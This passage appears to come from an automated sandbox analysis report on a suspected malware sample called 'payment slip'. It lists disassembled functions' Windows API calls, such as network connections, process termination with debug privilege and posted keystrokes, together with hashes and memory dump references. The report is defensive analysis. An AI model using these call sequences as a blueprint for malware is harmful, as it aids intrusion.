                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameParentSend
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1290815626-3381328864
                                        • Opcode ID: 3eb35731134b9866e10559de4ba1b8161ee020c148a2b9b32e6f1da96e44c64a
                                        • Instruction ID: 9e3ed4af8df75a74c266fd6f48926b3993a564105d3bb350367ec8d50b8ef90f
                                        • Opcode Fuzzy Hash: 3eb35731134b9866e10559de4ba1b8161ee020c148a2b9b32e6f1da96e44c64a
                                        • Instruction Fuzzy Hash: 7F11EC7A688706BAFE116720DC07DFB37DCDB15726F200116FB04A90E2FFA558557614
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                        • String ID:
                                        • API String ID: 1282221369-0
                                        • Opcode ID: 772fa45dd3188dc4a5f852cd547726591804bd8783e8427523d7b23ffddb4862
                                        • Instruction ID: 1741abb00b9734ea0f05e2114653837793e1eb24416a971899a8c3c5766010e0
                                        • Opcode Fuzzy Hash: 772fa45dd3188dc4a5f852cd547726591804bd8783e8427523d7b23ffddb4862
                                        • Instruction Fuzzy Hash: 8F611971A04601AFEB25AFB49841FBE7BE7AF05350F04417EF98597242DA369E4187A0
                                        APIs
                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00086890
                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 000868A9
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000868B9
                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 000868D1
                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000868F2
                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00048874,00000000,00000000,00000000,000000FF,00000000), ref: 00086901
                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0008691E
                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00048874,00000000,00000000,00000000,000000FF,00000000), ref: 0008692D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                        • String ID:
                                        • API String ID: 1268354404-0
                                        • Opcode ID: 6dafdfae072e3c8e24a42bd24f1f8ec22f39a3e1cdcfaf8e46fa3a9e334745a6
                                        • Instruction ID: d06ff88c92382ad4269b04c9f602de5f2fb15b9b7c1d1b79012bd4e43d49b41c
                                        • Opcode Fuzzy Hash: 6dafdfae072e3c8e24a42bd24f1f8ec22f39a3e1cdcfaf8e46fa3a9e334745a6
                                        • Instruction Fuzzy Hash: C5515AB0600205EFEB20DF24CC55FAE7BB5FB44750F108628F996972A0DB75E990DB94
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000AC182
                                        • GetLastError.KERNEL32 ref: 000AC195
                                        • SetEvent.KERNEL32(?), ref: 000AC1A9
                                          • Part of subcall function 000AC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000AC272
                                          • Part of subcall function 000AC253: GetLastError.KERNEL32 ref: 000AC322
                                          • Part of subcall function 000AC253: SetEvent.KERNEL32(?), ref: 000AC336
                                          • Part of subcall function 000AC253: InternetCloseHandle.WININET(00000000), ref: 000AC341
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                        • String ID:
                                        • API String ID: 337547030-0
                                        • Opcode ID: ce1c52117203a57327d56b0312b7da77226c0ff49cf15af7341888862cb19124
                                        • Instruction ID: 9c888ac863141b38a524e2384d632c8a6e02283ba8e92b7cb61aaa40a126d023
                                        • Opcode Fuzzy Hash: ce1c52117203a57327d56b0312b7da77226c0ff49cf15af7341888862cb19124
                                        • Instruction Fuzzy Hash: 7B31BE71200645AFFB219FE5DD04EAABBF8FF1A300B05452EF95A86610D735E810DBA0
                                        APIs
                                          • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                          • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                          • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 000925BD
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000925DB
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 000925DF
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 000925E9
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00092601
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00092605
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0009260F
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00092623
                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00092627
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: 260cda2da3b8de5cbd366892a457d085662a199ace28fd4b4a20910ab3e77f3f
                                        • Instruction ID: 2297a3c54597f6413d42c50a0d0bedc68d6da82e4f207af73ec04683fa05ccc6
                                        • Opcode Fuzzy Hash: 260cda2da3b8de5cbd366892a457d085662a199ace28fd4b4a20910ab3e77f3f
                                        • Instruction Fuzzy Hash: B101F230790610BBFB206769DC8AF993F59DF4EB12F110001F318AF1E2C9F22444DAAA
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00091449,?,?,00000000), ref: 0009180C
                                        • HeapAlloc.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 00091813
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00091449,?,?,00000000), ref: 00091828
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00091449,?,?,00000000), ref: 00091830
                                        • DuplicateHandle.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 00091833
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00091449,?,?,00000000), ref: 00091843
                                        • GetCurrentProcess.KERNEL32(00091449,00000000,?,00091449,?,?,00000000), ref: 0009184B
                                        • DuplicateHandle.KERNEL32(00000000,?,00091449,?,?,00000000), ref: 0009184E
                                        • CreateThread.KERNEL32(00000000,00000000,00091874,00000000,00000000,00000000), ref: 00091868
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                        • String ID:
                                        • API String ID: 1957940570-0
                                        • Opcode ID: 988dc9d0380e7eaa1fdc3bc85dad13b1867fd34d91671d5bcbfbb982e5167f0a
                                        • Instruction ID: e77362e85b62c784bc5f8b533100d9aed017eedf83cd1aa7534de967fd0a4358
                                        • Opcode Fuzzy Hash: 988dc9d0380e7eaa1fdc3bc85dad13b1867fd34d91671d5bcbfbb982e5167f0a
                                        • Instruction Fuzzy Hash: 0001BBB5240348BFF710ABA6DC4DF6B3BACEB8AB11F044411FA09DB1A1CA749800CB20
                                        APIs
                                          • Part of subcall function 0009D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0009D501
                                          • Part of subcall function 0009D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0009D50F
                                          • Part of subcall function 0009D4DC: CloseHandle.KERNEL32(00000000), ref: 0009D5DC
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000BA16D
                                        • GetLastError.KERNEL32 ref: 000BA180
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000BA1B3
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 000BA268
                                        • GetLastError.KERNEL32(00000000), ref: 000BA273
                                        • CloseHandle.KERNEL32(00000000), ref: 000BA2C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        • Opcode ID: 3d02591d8c66173df777c9d88fb45191e5d256c3bd6db97610d3a9e6987ce72f
                                        • Instruction ID: 14bab7f3154b8e1a7af7423a310a3b76818b980c0aed777553de2f20c8d222b1
                                        • Opcode Fuzzy Hash: 3d02591d8c66173df777c9d88fb45191e5d256c3bd6db97610d3a9e6987ce72f
                                        • Instruction Fuzzy Hash: B5619130204242AFE720DF19C494F99BBE5AF55318F18849CE45A8BBA3C776ED45CB92
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 000C3925
                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 000C393A
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 000C3954
                                        • _wcslen.LIBCMT ref: 000C3999
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 000C39C6
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 000C39F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window_wcslen
                                        • String ID: SysListView32
                                        • API String ID: 2147712094-78025650
                                        • Opcode ID: 903011e81ae142259498ef190e6e234db7011f2ff63e10901466cd4cb801fcc8
                                        • Instruction ID: 5128c7a4ef4d3a25f695c0837f5df19860282b2bca2791b9510d5e0ba328ffd5
                                        • Opcode Fuzzy Hash: 903011e81ae142259498ef190e6e234db7011f2ff63e10901466cd4cb801fcc8
                                        • Instruction Fuzzy Hash: CD41C231A10319ABEF219F64CC45FEE7BA9EF08350F10452AF948E7281D7B59E84CB90
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0009BCFD
                                        • IsMenu.USER32(00000000), ref: 0009BD1D
                                        • CreatePopupMenu.USER32 ref: 0009BD53
                                        • GetMenuItemCount.USER32(00E154F8), ref: 0009BDA4
                                        • InsertMenuItemW.USER32(00E154F8,?,00000001,00000030), ref: 0009BDCC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                        • String ID: 0$2
                                        • API String ID: 93392585-3793063076
                                        • Opcode ID: 6ebdd1e76ee771b76961aef442c1a83c502e5f6c48df07eb5188be999dd18dfc
                                        • Instruction ID: 397d7cc4d2680b48ac69564aec4048a7992ba1d014543532b0266e67c48b4da8
                                        • Opcode Fuzzy Hash: 6ebdd1e76ee771b76961aef442c1a83c502e5f6c48df07eb5188be999dd18dfc
                                        • Instruction Fuzzy Hash: C851B070A02209DBEF20CFA8EA88BAEBBF4BF45324F144159E456DB291E7709941DB51
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0008F3AB,00000000,?,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 000C824C
                                        • EnableWindow.USER32(00000000,00000000), ref: 000C8272
                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 000C82D1
                                        • ShowWindow.USER32(00000000,00000004), ref: 000C82E5
                                        • EnableWindow.USER32(00000000,00000001), ref: 000C830B
                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 000C832F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Show$Enable$MessageSend
                                        • String ID: U
                                        • API String ID: 642888154-2399391058
                                        • Opcode ID: bbcde31bab9295200c2c70bc49f9f726f557b5fe54ed43cbff448d9ab2f8052c
                                        • Instruction ID: 292b9e8cba85fcf0a3719ba5a9afad8327ee1bdf5bc1f4c06edccaf60a8da7d2
                                        • Opcode Fuzzy Hash: bbcde31bab9295200c2c70bc49f9f726f557b5fe54ed43cbff448d9ab2f8052c
                                        • Instruction Fuzzy Hash: D841A234601644EFEB61CF15C89DFEC7BE0FB0A714F1892ADE5484B2A2CB75A881CB54
                                        APIs
                                        • LoadIconW.USER32(00000000,00007F03), ref: 0009C913
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2457776203-404129466
                                        • Opcode ID: af5d3c9b298bf207a8707104844dbbd3e8800f472176784948213f51f89eac33
                                        • Instruction ID: 62dfccbf9acd0bbe8e1e9a2e3b606f4c36231d8ba09d5cd519614c4e20125c37
                                        • Opcode Fuzzy Hash: af5d3c9b298bf207a8707104844dbbd3e8800f472176784948213f51f89eac33
                                        • Instruction Fuzzy Hash: 48112B35A8D30BBAFB006B54DC86CEF77DCDF15319B20002AFA00A6183D7A55D407365
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$LocalTime
                                        • String ID:
                                        • API String ID: 952045576-0
                                        • Opcode ID: 9f1e725e0b83db06a7b0b749dfa4a5e05822b4c1f869f3c00bf565448749935e
                                        • Instruction ID: aebb186f47b63da8e41aae2210be7bec8a7ffd4ded99aa2ceb4c0c2b6f1cc888
                                        • Opcode Fuzzy Hash: 9f1e725e0b83db06a7b0b749dfa4a5e05822b4c1f869f3c00bf565448749935e
                                        • Instruction Fuzzy Hash: DA418E65C1021876CB21EBB4C88A9DFB7BCAF45711F508466E918E3123FB34E659C3A6
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0004F953
                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0008F3D1
                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0008682C,00000004,00000000,00000000), ref: 0008F454
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: ed3c8df6083c238ff9cd91bdd9bc143507d49fd0de72213effde5b580ee31794
                                        • Instruction ID: dd1034f0f32012c44b671cd2989623e54749d98bbb2dc7e89cbab9e38edda851
                                        • Opcode Fuzzy Hash: ed3c8df6083c238ff9cd91bdd9bc143507d49fd0de72213effde5b580ee31794
                                        • Instruction Fuzzy Hash: 3E4128B0208682BAE779AF38C988F7A7BD1BF56314F14403DE0CB92561C775AD80CB15
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 000C2D1B
                                        • GetDC.USER32(00000000), ref: 000C2D23
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000C2D2E
                                        • ReleaseDC.USER32(00000000,00000000), ref: 000C2D3A
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 000C2D76
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 000C2D87
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,000C5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 000C2DC2
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000C2DE1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID:
                                        • API String ID: 3864802216-0
                                        • Opcode ID: 1afcd9f24f074043833279da9f03d80442525f9146762b9a2e780b73efc3418a
                                        • Instruction ID: 20347feb13cb65336bf39967c088e7200e97f88ce8e70f6ac440186d6ad02c65
                                        • Opcode Fuzzy Hash: 1afcd9f24f074043833279da9f03d80442525f9146762b9a2e780b73efc3418a
                                        • Instruction Fuzzy Hash: 1A317A72201614BFFB218F54CC8AFEB3BA9EF19715F084055FE099A2A1C6799C51CBA4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: e9d4afcc44cc0021113652c9cefecb544a6917023baafd9a37af74f79718c949
                                        • Instruction ID: 924f3217c1dc2e5c39c876940cb786f9965c0aaf6e2e799cac65a44bee8629a9
                                        • Opcode Fuzzy Hash: e9d4afcc44cc0021113652c9cefecb544a6917023baafd9a37af74f79718c949
                                        • Instruction Fuzzy Hash: 6B219871745905779A155A229ED2FFF639DAF10386F440024FE045B582F760EE1493A5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NULL Pointer assignment$Not an Object type
                                        • API String ID: 0-572801152
                                        • Opcode ID: 0efd7597c0634ad2ee71ada2fc26801f01b6384d5cfb3c15dfa085d1d8d714da
                                        • Instruction ID: 2db25afc90c3f60bb9cc537bdf6825db09155876c17b0f624c94147a39f7580a
                                        • Opcode Fuzzy Hash: 0efd7597c0634ad2ee71ada2fc26801f01b6384d5cfb3c15dfa085d1d8d714da
                                        • Instruction Fuzzy Hash: 80D18C71A0060AAFDF14DFA8CC81BEEB7F5BF48345F1484A9E915AB281E7719D41CB90
                                        APIs
                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,000717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 000715CE
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00071651
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,000717FB,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 000716E4
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 000716FB
                                          • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00071777
                                        • __freea.LIBCMT ref: 000717A2
                                        • __freea.LIBCMT ref: 000717AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
